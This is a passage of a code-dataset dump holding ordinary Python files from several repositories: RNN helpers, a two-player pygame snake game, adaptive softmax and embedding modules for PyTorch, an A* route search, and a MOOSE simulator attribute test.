np.newaxis, :]).type(torch.float)\n action_pred, hidden = net(inputs.to(device))\n\n # Compute performance\n action_pred = action_pred.cpu().detach().numpy()\n #choice = action_pred[-1, 0, 0]\n choice = action_pred[-1, 0]\n all_choices.append(choice)\n all_gts.append(gt[-1])\n correct = abs(choice-gt[-1])\n all_obs.append(ob)\n\n # Log stimulus period activity\n activity.append(hidden.cpu().detach().numpy()[:, 0, :])\n #X.append(x.cpu().detach().numpy()[:, 0, :])\n\n act = torch.tensor(activity).cpu().type(torch.float)\n #inputs = torch.tensor(X).cpu().type(torch.float)\n z = act @ net.rnn.m.detach().cpu().type(torch.float)\n gts = np.array(all_gts)\n choices = np.array(all_choices)\n obs = np.array(all_obs)\n\n return z, act, obs, gts, choices\n \ndef get_modelpath(envid):\n # Make a local file directories\n path = Path('nets/') / 'files'\n os.makedirs(path, exist_ok=True)\n path = path / envid\n os.makedirs(path, exist_ok=True)\n return path\n\ndef make_vecs(net):\n \"\"\"\n return a list of vectors (list of numpy arrays of shape n) composing a network\n \"\"\"\n inputs = np.squeeze([v.detach().cpu().numpy() for v in [net.rnn.IA, net.rnn.IB,net.rnn.IXA,net.rnn.IXB]])\n w = list(net.fc.detach().cpu().numpy().T)\n \n \n return np.array([net.rnn.n.detach().cpu().numpy(), net.rnn.m.detach().cpu().numpy()] + w + list(inputs))\n return np.array(list(net.rnn.n.detach().cpu().numpy().T) + list(net.rnn.m.detach().cpu().numpy().T) + w + list(inputs)).T\n\n\ndef load_net(envid, env,device=\"cpu\"):\n \n modelpath = get_modelpath(envid)\n with open(modelpath / 'config.json') as f:\n config = json.load(f)\n net = RNNNet(input_size=env.observation_space.shape[0],\n hidden_size=config['hidden_size'],\n output_size=env.action_space.n,noise=config['noise'],dt=config['dt'])\n net.load_state_dict(torch.load(modelpath / 'net.pth', map_location=torch.device(device)))\n\n return net\n \n","repo_name":"jmourabarbosa/multi-area-ctx","sub_path":"helpers/my_vanilla_lowRankRNN.py","file_name":"my_vanilla_lowRankRNN.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23761373294","text":"import random\r\nfrom collections import deque\r\nimport pyautogui\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\n# pygame.display.Info().current_w\r\n# pygame.display.Info().current_h\r\nGAME_CELL_SIZE_PX 
= 20\r\nWIDTH, HEIGHT = pyautogui.size()\r\nGAME_CELLS_X = WIDTH // GAME_CELL_SIZE_PX\r\nGAME_CELLS_Y = (HEIGHT - 100) // GAME_CELL_SIZE_PX\r\n\r\nFPS = 120\r\nMPS = 10\r\n\r\nFRAMES_PER_MOVE = FPS // MPS\r\n\r\nrandom.seed(a=1)\r\n\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nGRAY = (200, 200, 200)\r\nPINK = (255, 192, 203)\r\nORANGE = (255, 165, 0)\r\n\r\nbackground_color = BLACK\r\n\r\n\r\ndef draw_segment(surface, x, y, color):\r\n COLOR = color\r\n position = (\r\n x * GAME_CELL_SIZE_PX,\r\n y * GAME_CELL_SIZE_PX,\r\n GAME_CELL_SIZE_PX,\r\n GAME_CELL_SIZE_PX\r\n )\r\n pygame.draw.rect(surface, COLOR, position)\r\n\r\n\r\ndef draw_food(surface, x, y):\r\n RED = (255, 0, 0)\r\n position = (\r\n x * GAME_CELL_SIZE_PX + GAME_CELL_SIZE_PX // 2,\r\n y * GAME_CELL_SIZE_PX + GAME_CELL_SIZE_PX // 2\r\n )\r\n pygame.draw.circle(surface, RED, position, GAME_CELL_SIZE_PX // 2)\r\n\r\n\r\nclass Snake:\r\n vectors = {\r\n 'UP': (0, -1),\r\n 'DOWN': (0, 1),\r\n 'LEFT': (-1, 0),\r\n 'RIGHT': (1, 0)\r\n }\r\n\r\n def __init__(self, food):\r\n self.segments = deque([[GAME_CELLS_X - 0, GAME_CELLS_Y // 2], [GAME_CELLS_X - 1, GAME_CELLS_Y // 2],\r\n [GAME_CELLS_X - 2, GAME_CELLS_Y // 2], [GAME_CELLS_X - 3, GAME_CELLS_Y // 2],\r\n [GAME_CELLS_X - 4, GAME_CELLS_Y // 2], [GAME_CELLS_X - 5, GAME_CELLS_Y // 2]])\r\n self.direction = 'LEFT'\r\n self.last_direction = self.direction\r\n self.food = food\r\n\r\n def _normalize_segments(self):\r\n for segment in self.segments:\r\n\r\n if segment[0] >= GAME_CELLS_X:\r\n segment[0] -= GAME_CELLS_X\r\n if segment[0] < 0:\r\n segment[0] += GAME_CELLS_X\r\n if segment[1] >= GAME_CELLS_Y:\r\n segment[1] -= GAME_CELLS_Y\r\n if segment[1] < 0:\r\n segment[1] += GAME_CELLS_Y\r\n\r\n def move(self):\r\n vector = self.vectors.get(self.direction, (0, 0))\r\n self.last_direction = self.direction\r\n first_segment = self.segments[-1]\r\n self.segments.append(\r\n [first_segment[0] + vector[0], first_segment[1] + vector[1]]\r\n )\r\n self._normalize_segments()\r\n if not self.try_to_eat():\r\n self.segments.popleft()\r\n\r\n def draw(self, surface):\r\n for segment in self.segments:\r\n draw_segment(surface, *segment, (0, 0, 255))\r\n draw_segment(surface, *self.segments[-1], (255, 255, 255))\r\n\r\n def process_event(self, event):\r\n if event.type == KEYDOWN:\r\n if event.key == K_LEFT:\r\n if not self.last_direction == 'RIGHT':\r\n self.direction = 'LEFT'\r\n elif event.key == K_RIGHT:\r\n if not self.last_direction == 'LEFT':\r\n self.direction = 'RIGHT'\r\n elif event.key == K_UP:\r\n if not self.last_direction == 'DOWN':\r\n self.direction = 'UP'\r\n elif event.key == K_DOWN:\r\n if not self.last_direction == 'UP':\r\n self.direction = 'DOWN'\r\n\r\n def try_to_eat(self):\r\n if (\r\n self.segments[-1][0] == self.food.x\r\n and\r\n self.segments[-1][1] == self.food.y\r\n ):\r\n self.food.eaten()\r\n return True\r\n return False\r\n\r\n def check(self, snake):\r\n for segment in snake.segments:\r\n if self.segments[-1] == segment:\r\n return True\r\n for segment in self.segments:\r\n if self.segments[-1] == segment:\r\n if not self.segments[-1] is segment:\r\n return True\r\n return False\r\n\r\n\r\nclass Snake2:\r\n vectors = {\r\n 'UP': (0, -1),\r\n 'DOWN': (0, 1),\r\n 'LEFT': (-1, 0),\r\n 'RIGHT': (1, 0)\r\n }\r\n\r\n def __init__(self, food):\r\n self.segments = deque(\r\n [[0, GAME_CELLS_Y // 2], [1, GAME_CELLS_Y // 2], [2, GAME_CELLS_Y // 2], [3, GAME_CELLS_Y // 2],\r\n [4, GAME_CELLS_Y // 2], [5, GAME_CELLS_Y // 
2]])\r\n\r\n self.direction = 'RIGHT'\r\n self.last_direction = self.direction\r\n self.food = food\r\n self.color = (0, 255, 0)\r\n\r\n def _normalize_segments(self):\r\n for segment in self.segments:\r\n if segment[0] >= GAME_CELLS_X:\r\n segment[0] -= GAME_CELLS_X\r\n if segment[0] < 0:\r\n segment[0] += GAME_CELLS_X\r\n if segment[1] >= GAME_CELLS_Y:\r\n segment[1] -= GAME_CELLS_Y\r\n if segment[1] < 0:\r\n segment[1] += GAME_CELLS_Y\r\n\r\n def move(self):\r\n vector = self.vectors.get(self.direction, (0, 0))\r\n self.last_direction = self.direction\r\n first_segment = self.segments[-1]\r\n self.segments.append(\r\n [first_segment[0] + vector[0], first_segment[1] + vector[1]]\r\n )\r\n self._normalize_segments()\r\n if not self.try_to_eat():\r\n self.segments.popleft()\r\n\r\n def draw(self, surface):\r\n for segment in self.segments:\r\n draw_segment(surface, *segment, self.color)\r\n draw_segment(surface, *self.segments[-1], (255, 255, 255))\r\n\r\n def process_event(self, event):\r\n if event.type == KEYDOWN:\r\n if event.key == K_a:\r\n if not self.last_direction == 'RIGHT':\r\n self.direction = 'LEFT'\r\n elif event.key == K_d:\r\n if not self.last_direction == 'LEFT':\r\n self.direction = 'RIGHT'\r\n elif event.key == K_w:\r\n if not self.last_direction == 'DOWN':\r\n self.direction = 'UP'\r\n elif event.key == K_s:\r\n if not self.last_direction == 'UP':\r\n self.direction = 'DOWN'\r\n\r\n def try_to_eat(self):\r\n if (\r\n self.segments[-1][0] == self.food.x\r\n and\r\n self.segments[-1][1] == self.food.y\r\n ):\r\n self.food.eaten()\r\n return True\r\n return False\r\n\r\n def check(self, snake):\r\n for segment in snake.segments:\r\n if self.segments[-1] == segment:\r\n return True\r\n for segment in self.segments:\r\n if self.segments[-1] == segment:\r\n if not self.segments[-1] is segment:\r\n return True\r\n return False\r\n\r\n\r\nclass FoodProvider:\r\n def __init__(self):\r\n self._get_new_cords()\r\n\r\n def _get_new_cords(self):\r\n self.x = random.randrange(GAME_CELLS_X)\r\n self.y = random.randrange(GAME_CELLS_Y)\r\n global MPS, FRAMES_PER_MOVE\r\n MPS = MPS + 1\r\n FRAMES_PER_MOVE = FPS // MPS\r\n\r\n def draw(self, surface):\r\n draw_food(surface, self.x, self.y)\r\n\r\n def eaten(self):\r\n global background_color\r\n background_color = (random.randrange(0, 255), random.randrange(0, 255), random.randrange(0, 255))\r\n self._get_new_cords()\r\n\r\n\r\ndef draw_background(surface):\r\n position = (\r\n 0, 0,\r\n # GAME_CELLS_X * GAME_CELL_SIZE_PX,\r\n # GAME_CELLS_Y * GAME_CELL_SIZE_PX\r\n WIDTH,\r\n HEIGHT\r\n )\r\n position2 = (\r\n 0, HEIGHT - 100,\r\n WIDTH,\r\n 100\r\n )\r\n position3 = (\r\n 0, HEIGHT - 100,\r\n WIDTH,\r\n 10\r\n )\r\n pygame.draw.rect(surface, background_color, position)\r\n pygame.draw.rect(surface, GRAY, position2)\r\n pygame.draw.rect(surface, BLACK, position3)\r\n\r\n\r\ndef run_game():\r\n pygame.init()\r\n pygame.mixer.quit()\r\n\r\n fpsClock = pygame.time.Clock()\r\n DISPLAYSURF = pygame.display.set_mode(\r\n (\r\n # GAME_CELLS_X * GAME_CELL_SIZE_PX,\r\n # GAME_CELLS_Y * GAME_CELL_SIZE_PX\r\n pygame.display.Info().current_w,\r\n pygame.display.Info().current_h\r\n )\r\n )\r\n pygame.display.set_caption('Moving segments with snake class')\r\n food = FoodProvider()\r\n snake = Snake(food=food)\r\n snake2 = Snake2(food=food)\r\n frames_elapsed_since_last_move = 0\r\n text = ''\r\n game_is_going = True\r\n font = pygame.font.SysFont(\"comicsansms\", 50)\r\n while game_is_going:\r\n for event in pygame.event.get():\r\n # print('event: 
{}'.format(event))\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n snake.process_event(event)\r\n snake2.process_event(event)\r\n draw_background(DISPLAYSURF)\r\n snake.draw(DISPLAYSURF)\r\n snake2.draw(DISPLAYSURF)\r\n if snake2.check(snake):\r\n game_is_going = False\r\n text = 'arrows won'\r\n if snake.check(snake2):\r\n game_is_going = False\r\n text = 'wasd won'\r\n food.draw(DISPLAYSURF)\r\n frames_elapsed_since_last_move += 1\r\n if frames_elapsed_since_last_move >= FRAMES_PER_MOVE:\r\n frames_elapsed_since_last_move = 0\r\n snake.move()\r\n snake2.move()\r\n global MPS\r\n speed_text = 'speed: ' + str(MPS)\r\n wasd_text = 'wasd score: ' + str(len(snake2.segments) - 6)\r\n arrows_text = 'arrows score: ' + str(len(snake.segments) - 6)\r\n img = font.render(speed_text, True, (0, 0, 0))\r\n a = img.get_rect().width\r\n wasd_img = font.render(wasd_text, True, (0, 0, 0))\r\n arrows_img = font.render(arrows_text, True, (0, 0, 0))\r\n DISPLAYSURF.blit(img, (WIDTH // 2 - a // 2, HEIGHT - 80))\r\n DISPLAYSURF.blit(wasd_img, (WIDTH // 10, HEIGHT - 80))\r\n b = arrows_img.get_rect().width\r\n DISPLAYSURF.blit(arrows_img, (WIDTH - b - WIDTH // 10, HEIGHT - 80))\r\n pygame.display.update()\r\n fpsClock.tick(FPS)\r\n\r\n img = font.render(text, True, (0, 0, 0))\r\n\r\n while not game_is_going:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n game_is_going = True\r\n if event.type == KEYDOWN:\r\n if event.key == K_SPACE:\r\n global background_color\r\n background_color = BLACK\r\n MPS = 10\r\n run_game()\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n DISPLAYSURF.fill((255, 255, 255))\r\n DISPLAYSURF.blit(img, (20, 120))\r\n pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\n\r\nif __name__ == '__main__':\r\n run_game()\r\n","repo_name":"causesauce/snake_game_2d","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8155609894","text":"from typing import Optional, Sequence, Tuple, List\nimport torch\nimport torch.nn.functional as F\n\nfrom nnlib.nn.modules import BaseModule, Linear, Embedding, Sequential, ModuleList\n\n\ndef _preprocess_cutoffs(cutoffs: Sequence[int], num_classes: int) -> List[int]:\n cutoffs = sorted(list(cutoffs))\n\n if len(cutoffs) > 0:\n if cutoffs[-1] == num_classes:\n cutoffs = cutoffs[:-1]\n if cutoffs[0] == 0:\n cutoffs = cutoffs[1:]\n\n if len(cutoffs) > 0:\n if (cutoffs != sorted(cutoffs)) or \\\n (min(cutoffs) < 0) or \\\n (max(cutoffs) >= num_classes) or \\\n (len(set(cutoffs)) != len(cutoffs)) or \\\n any([int(c) != c for c in cutoffs]):\n raise ValueError(\n \"[ERROR:NN] AdaptiveLogSoftmaxWithLoss cutoff should be a sequence of unique, positive integers \"\n \"sorted in an increasing order, each value is between [1, num_classes).\")\n else: # len(cutoffs) == 0:\n raise ValueError(\"[ERROR:NN] Cutoffs empty. 
Consider using native softmax\")\n\n return cutoffs\n\n\nclass AdaptiveLogSoftmaxWithLoss(BaseModule):\n\n def __init__(self,\n num_classes: int,\n num_features: int,\n cutoffs: Sequence[int],\n div_value: float = 4.0,\n bias: bool = True,\n shortlist_proj: bool = False,\n reduction: str = \"mean\") -> None:\n super(AdaptiveLogSoftmaxWithLoss, self).__init__()\n\n cutoffs = _preprocess_cutoffs(cutoffs, num_classes)\n\n self.num_features = num_features\n self.num_classes = num_classes\n\n self.cutoffs = cutoffs + [num_classes] # [1000, 5000,] + [10000]: last index of each\n assert len(self.cutoffs) >= 2\n self.div_value = div_value\n self.use_bias = bias\n self.use_shortlist_proj = shortlist_proj\n self.reduction = reduction\n\n self.shortlist_size = self.cutoffs[0]\n self.n_clusters = len(self.cutoffs) - 1\n\n if not shortlist_proj:\n self.shortlist = Sequential(\n Linear(self.num_features, self.shortlist_size, bias=bias),\n ) # for consistency (nn.Sequential)\n else:\n self.shortlist = Sequential(\n Linear(self.num_features, self.num_features, bias=False),\n Linear(self.num_features, self.shortlist_size, bias=bias) # embedding\n )\n self.cluster = Linear(self.num_features, self.n_clusters, bias=bias)\n\n self.tail = ModuleList()\n for i in range(self.n_clusters):\n out_size = self.cutoffs[i + 1] - self.cutoffs[i]\n if div_value == 1:\n self.tail.append(Sequential(\n Linear(self.num_features, out_size, bias=bias), # embedding\n )) # for consistency (nn.Sequential)\n else:\n head_size = int(num_features / (self.div_value ** (i + 1)))\n self.tail.append(Sequential(\n Linear(self.num_features, head_size, bias=False),\n Linear(head_size, out_size, bias=bias) # embedding\n ))\n\n def forward(self, x: torch.Tensor, target: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n if x.shape[0] != target.shape[0]:\n raise RuntimeError(f\"[ERROR:NN] Target and Input should have same batch dimension. \"\n f\"Shape of input: {x.shape}, target: {target.shape}\")\n\n used_rows = 0\n batch_size = target.shape[0]\n\n # output = x.new_zeros(batch_size) # target log probabilities (N,)\n output = torch.zeros(batch_size, dtype=torch.float32, device=x.device)\n gather_idx = target.new_empty(batch_size)\n\n cutoff_values = [0] + self.cutoffs\n for i in range(len(cutoff_values) - 1):\n low_idx = cutoff_values[i]\n high_idx = cutoff_values[i + 1]\n\n target_mask = torch.logical_and(torch.ge(target, low_idx), torch.lt(target, high_idx))\n row_indices = torch.nonzero(target_mask, as_tuple=True)[0]\n\n # no target is in batch\n if row_indices.numel() == 0:\n continue\n\n if i == 0: # shortlist\n # keep as-is in head label\n gather_idx.index_copy_(0, row_indices, target[target_mask])\n else:\n relative_target = target[target_mask] - low_idx\n x_subset = x.index_select(0, row_indices)\n\n cluster_output = self.tail[i - 1](x_subset)\n cluster_index = self.shortlist_size + i - 1\n\n # fill head label of cluster to cluster index\n gather_idx.index_fill_(0, row_indices, cluster_index)\n\n cluster_log_prob = F.log_softmax(cluster_output, dim=1)\n local_log_prob = cluster_log_prob.gather(1, relative_target.unsqueeze(1))\n output.index_copy_(0, row_indices, local_log_prob.squeeze(1))\n\n used_rows += row_indices.numel()\n\n if used_rows != batch_size:\n raise RuntimeError(f\"[ERROR:NN] Not all consumed. 
Should be {batch_size} but only used {used_rows}.\")\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n head_log_prob = F.log_softmax(head_output, dim=-1)\n # for word in shortlist: log(shortlist_prob_of_head)\n # for word in cluster: log(cluster_prob_of_head) + log(prob_in_cluster)\n output = output + head_log_prob.gather(1, gather_idx.unsqueeze(1)).squeeze()\n\n if self.reduction == \"mean\":\n loss = (-output).mean()\n elif self.reduction == \"sum\":\n loss = (-output).sum()\n else:\n loss = -output # no reduction\n\n return output, loss\n\n def _get_full_log_prob(self, x: torch.Tensor, head_output: torch.Tensor) -> torch.Tensor:\n \"\"\" Given input tensor, and output of `self.head`,\n compute the log of the full distribution \"\"\"\n\n batch_size = x.shape[0]\n\n out = x.new_empty(batch_size, self.num_classes)\n head_log_prob = F.log_softmax(head_output, dim=1)\n\n # copy shortlist prob\n out[:, :self.shortlist_size] = head_log_prob[:, :self.shortlist_size]\n\n for i, (start_idx, stop_idx) in enumerate(zip(self.cutoffs, self.cutoffs[1:])):\n cluster_output = self.tail[i](x)\n cluster_log_prob = F.log_softmax(cluster_output, dim=1)\n output_log_prob = cluster_log_prob + head_log_prob[:, self.shortlist_size + i].unsqueeze(1)\n\n out[:, start_idx:stop_idx] = output_log_prob\n return out\n\n def log_prob(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\" Computes log probabilities for all num_classes\"\"\"\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n return self._get_full_log_prob(x, head_output)\n\n def predict(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\" This is equivalent to `self.log_prob(input).argmax(dim=1)`\"\"\"\n\n short_output = self.shortlist(x) # (batch_size, shortlist_size)\n cluster_output = self.cluster(x) # (batch_size, n_clusters)\n head_output = torch.cat([short_output, cluster_output], dim=1) # (batch_size, shortlist_size + n_clusters)\n\n output = torch.argmax(head_output, dim=1)\n not_in_shortlist = torch.ge(output, self.shortlist_size)\n all_in_shortlist = not (not_in_shortlist.any())\n\n if all_in_shortlist:\n return output\n\n elif not_in_shortlist.all():\n log_prob = self._get_full_log_prob(x, head_output)\n return torch.argmax(log_prob, dim=1)\n\n else:\n log_prob = self._get_full_log_prob(x[not_in_shortlist], head_output[not_in_shortlist])\n output[not_in_shortlist] = torch.argmax(log_prob, dim=1)\n return output\n\n def extra_repr(self) -> str:\n s = f\"{self.num_classes}, {self.num_features}, cutoffs={self.cutoffs[:-1]}, div_value={self.div_value}\"\n if self.use_bias:\n s += f\", bias={self.use_bias}\"\n if self.use_shortlist_proj:\n s += f\", shortlist_proj={self.use_shortlist_proj}\"\n return s\n\n\nclass AdaptiveEmbedding(BaseModule):\n\n def __init__(self,\n num_classes: int,\n num_features: int,\n cutoffs: Sequence[int],\n div_value: float = 4.0,\n padding_idx: Optional[int] = None,\n shortlist_proj: bool = False,\n word_drop_prob: float = 0.0):\n super(AdaptiveEmbedding, self).__init__()\n\n cutoffs = _preprocess_cutoffs(cutoffs, num_classes)\n\n self.num_features = num_features\n self.num_classes = num_classes\n\n self.cutoffs = cutoffs + [num_classes] # [1000, 5000,] 
+ [10000]: last index of each\n assert len(self.cutoffs) >= 2\n self.div_value = div_value\n self.use_shortlist_proj = shortlist_proj\n self.padding_idx = padding_idx\n\n self.shortlist_size = self.cutoffs[0]\n self.n_clusters = len(self.cutoffs) - 1\n\n if not shortlist_proj:\n self.shortlist = Sequential(\n Embedding(self.shortlist_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n ) # for consistency (nn.Sequential)\n else:\n self.shortlist = Sequential(\n Embedding(self.shortlist_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n Linear(num_features, num_features, bias=False)\n )\n\n self.tail = ModuleList()\n for i in range(self.n_clusters):\n out_size = self.cutoffs[i + 1] - self.cutoffs[i]\n if div_value == 1:\n self.tail.append(Sequential(\n Embedding(out_size, num_features, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n )) # for consistency (nn.Sequential)\n else:\n head_size = int(num_features / (self.div_value ** (i + 1)))\n self.tail.append(Sequential(\n Embedding(out_size, head_size, padding_idx=padding_idx,\n word_drop_prob=word_drop_prob),\n Linear(head_size, num_features, bias=False),\n ))\n\n def forward(self, indices: torch.Tensor) -> torch.Tensor:\n sequence_len, batch_size = indices.shape\n target = indices.view(-1)\n\n dtype = self.tail[0][-1].weight.dtype\n device = self.tail[0][-1].weight.device\n output = torch.zeros(sequence_len * batch_size, self.num_features, dtype=dtype, device=device)\n\n used_rows = 0\n cutoff_values = [0] + self.cutoffs\n for i in range(len(cutoff_values) - 1):\n low_idx = cutoff_values[i]\n high_idx = cutoff_values[i + 1]\n\n target_mask = torch.logical_and(torch.ge(target, low_idx), torch.lt(target, high_idx))\n row_indices = torch.nonzero(target_mask, as_tuple=True)[0]\n\n # no target is in batch\n if row_indices.numel() == 0:\n continue\n\n if i == 0: # shortlist\n # keep as-is in head label\n proj = self.shortlist(target[target_mask])\n if output.dtype != proj.dtype: # ad-hoc fix\n output = output.to(proj.dtype)\n if output.device != proj.device: # ad-hoc fix\n output = output.to(proj.device)\n output.index_copy_(0, row_indices, proj)\n else:\n relative_target = target[target_mask] - low_idx\n proj = self.tail[i - 1](relative_target)\n output.index_copy_(0, row_indices, proj)\n\n used_rows += row_indices.numel()\n\n if used_rows != output.shape[0]:\n raise RuntimeError(f\"[ERROR:NN] Not all consumed. 
Should be {output.shape[0]} but only used {used_rows}.\")\n\n output = output.view(sequence_len, batch_size, self.num_features)\n # output *= float(math.sqrt(self.num_features)) # skip and externally handle.\n\n return output\n\n def extra_repr(self) -> str:\n s = f\"{self.num_classes}, {self.num_features}, cutoffs={self.cutoffs[:-1]}, div_value={self.div_value}\"\n if self.padding_idx is not None:\n s += f\", padding_idx={self.padding_idx}\"\n if self.use_shortlist_proj:\n s += f\", shortlist_proj=True\"\n return s\n","repo_name":"aiha-lab/Attention-Head-Pruning","sub_path":"nnlib/nn/intrinsic/adaptive.py","file_name":"adaptive.py","file_ext":"py","file_size_in_byte":12960,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"69995024721","text":"from dictionaries import neighbours_dictionary, heuristic_disctionary, path_cost_dictionary\n\nstart_node = 'Arad'\ngoal_node = \"Bucharest\"\n\n\ndef a_star():\n # initialize priority queue with start_node in it\n priority_queue = PriorityQueue()\n goal_found = False\n # list of all visited nodes\n visited_nodes = []\n\n while priority_queue or not goal_found:\n current_node = priority_queue[0]\n visited_nodes.append(current_node)\n if current_node.city == goal_node:\n break\n priority_queue.remove(current_node)\n\n neighbours = neighbours_dictionary[current_node.city]\n # check if the node is an end node i.e. All neighbours are visited or no neighbour\n for neighbour in neighbours:\n # convert dictionary data to string for generic purpose\n neighbour = str(neighbour)\n if neighbour not in visited_nodes:\n # total path travelled from start node to current node + current node to neighbour node\n neighbour_GofN = current_node.GofN + int(path_cost_dictionary[current_node.city][neighbour])\n neighbour_node = Node(city=neighbour, GofN=neighbour_GofN, parent=current_node.city)\n priority_queue.priority_insert(neighbour_node)\n\n if priority_queue:\n print('GOAL NODE FOUND')\n print(\"VISITED NODES\")\n for x in visited_nodes:\n print(x.city, end=' ')\n\n # calculating optimal path from visited nodes\n print(\"OPTIMAL PATH\")\n optimal_path = [start_node]\n parent = start_node\n for child_node in visited_nodes:\n if child_node.parent == parent:\n optimal_path.append(child_node.city)\n parent = child_node.city\n print(optimal_path)\n\n\n else:\n print(\"goal node not found\")\n\n\nclass PriorityQueue(list):\n def __init__(self):\n first_node = node = Node(city=start_node, GofN=0, parent='NO PARENT')\n self.priority_insert(first_node)\n\n def priority_insert(self, node):\n i = 0\n for i in range(0, len(self)):\n if self[i].FofN > node.FofN:\n break\n self.insert(i, node)\n\n\nclass Node:\n def __init__(self, city, parent, GofN):\n # name of node\n self.city = city\n # name of parent node\n self.parent = parent\n # G(N) Path Cost Covered From Start Node to Current Node\n self.GofN = GofN\n # H(N) Heuristic Cost from Goal Node\n self.HofN = int(heuristic_disctionary[goal_node][self.city])\n # F(N) = G(N) + H(N)\n self.FofN = self.GofN + self.HofN\n","repo_name":"M-Talha517/AI_Searching_Algorithms","sub_path":"A_Star.py","file_name":"A_Star.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3509213171","text":"\"\"\"test_moose_attribs.py: \n\n\"\"\"\n \n__author__ = \"Dilawar Singh\"\n__copyright__ = \"Copyright 2017-, Dilawar Singh\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Dilawar 
Singh\"\n__email__ = \"dilawars@ncbs.res.in\"\n__status__ = \"Development\"\n\nimport sys\nimport os\nimport moose\n\nattribs = ['AdExIF', 'AdThreshIF', 'Adaptor', 'Annotator', 'Arith', 'BufPool',\n 'CaConc', 'CaConcBase', 'ChanBase', 'ChemCompt', 'Cinfo', 'Clock',\n 'Compartment', 'CompartmentBase', 'ConcChan', 'CplxEnzBase', 'CubeMesh',\n 'CylMesh', 'DestField', 'DiagonalMsg', 'DifBuffer', 'DifBufferBase',\n 'DifShell', 'DifShellBase', 'DiffAmp', 'Dsolve', 'ElementField',\n 'EndoMesh', 'Enz', 'EnzBase', 'ExIF', 'Finfo', 'Function',\n 'GapJunction', 'GraupnerBrunel2012CaPlasticitySynHandler', 'Group',\n 'Gsolve', 'HHChannel', 'HHChannel2D', 'HHChannelBase', 'HHGate',\n 'HHGate2D', 'HSolve', 'INFINITE', 'IntFire', 'IntFireBase', 'Interpol',\n 'Interpol2D', 'IzhIF', 'IzhikevichNrn', 'Ksolve', 'LIF', 'Leakage',\n 'LookupField', 'MMPump', 'MMenz', 'MarkovChannel' ,\n # 'MarkovGslSolver', # This is GSL specific.\n 'MarkovRateTable', 'MarkovSolver', 'MarkovSolverBase', 'MeshEntry',\n 'MgBlock', 'Msg', 'Mstring', 'NMDAChan', 'Nernst', 'NeuroMesh',\n 'Neuron', 'Neutral', 'OneToAllMsg', 'OneToOneDataIndexMsg',\n 'OneToOneMsg', 'PIDController', 'Pool', 'PoolBase',\n 'PostMaster', 'PsdMesh', 'PulseGen', 'PyRun', 'QIF', 'RC', 'RandSpike',\n 'Reac', 'ReacBase', 'SBML', 'STDPSynHandler', 'STDPSynapse',\n 'SeqSynHandler', 'Shell', 'SimpleSynHandler', 'SingleMsg', 'SparseMsg',\n 'Species', 'SpikeGen', 'SpikeStats', 'Spine', 'SpineMesh', 'Stats',\n 'SteadyState', 'StimulusTable', 'Stoich', 'Streamer', 'StringIO',\n 'SymCompartment', 'SynChan', 'SynHandlerBase', 'Synapse', 'Table',\n 'Table2', 'TableBase', 'TimeTable', 'VClamp', 'VERSION', 'Variable',\n 'VectorTable', 'ZombieBufPool', 'ZombieCaConc', 'ZombieCompartment',\n 'ZombieEnz', 'ZombieFunction', 'ZombieHHChannel', 'ZombieMMenz',\n 'ZombiePool', 'ZombieReac', '_moose', \n 'append_finfodocs', 'ce', 'chemMerge',\n 'chemUtil', 'closing', 'connect', 'copy', 'delete', 'division', 'doc',\n 'element', 'exists', 'finfotypes', 'fixXreacs', 'genesis', 'getCwe',\n 'getField', 'getFieldDict', 'getFieldNames', 'getfielddoc',\n 'getmoosedoc', 'isRunning', \n 'known_types', 'le', 'listmsg', 'loadModelInternal', 'melement',\n 'mergeChemModel', 'moose',\n 'mooseAddChemSolver', 'mooseDeleteChemSolver', 'mooseReadNML2',\n 'mooseReadSBML', 'mooseWriteKkit', 'mooseWriteNML2', 'mooseWriteSBML',\n 'moose_constants', 'moose_test', 'move',\n 'nml2Import_', 'pager', 'print_utils',\n 'pwe', 'pydoc', 'rand', 'reinit', \n 'seed', 'sequence_types', 'setClock', 'setCwe', 'showfield',\n 'showfields', 'showmsg', 'start', 'stop', 'syncDataHandler',\n 'test', 'testSched', 'toUnicode', 'useClock', 'utils', 'vec', 'version',\n 'warnings', 'wildcardFind']\n\ndef main():\n global attribs\n for at in attribs:\n assert hasattr( moose, at ), 'Attrib %s not found' % at \n print( getattr(moose, at ) )\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"BhallaLab/moose","sub_path":"moose-core/tests/python/test_moose_attribs.py","file_name":"test_moose_attribs.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"24095444306","text":"from gig import ents\nfrom utils 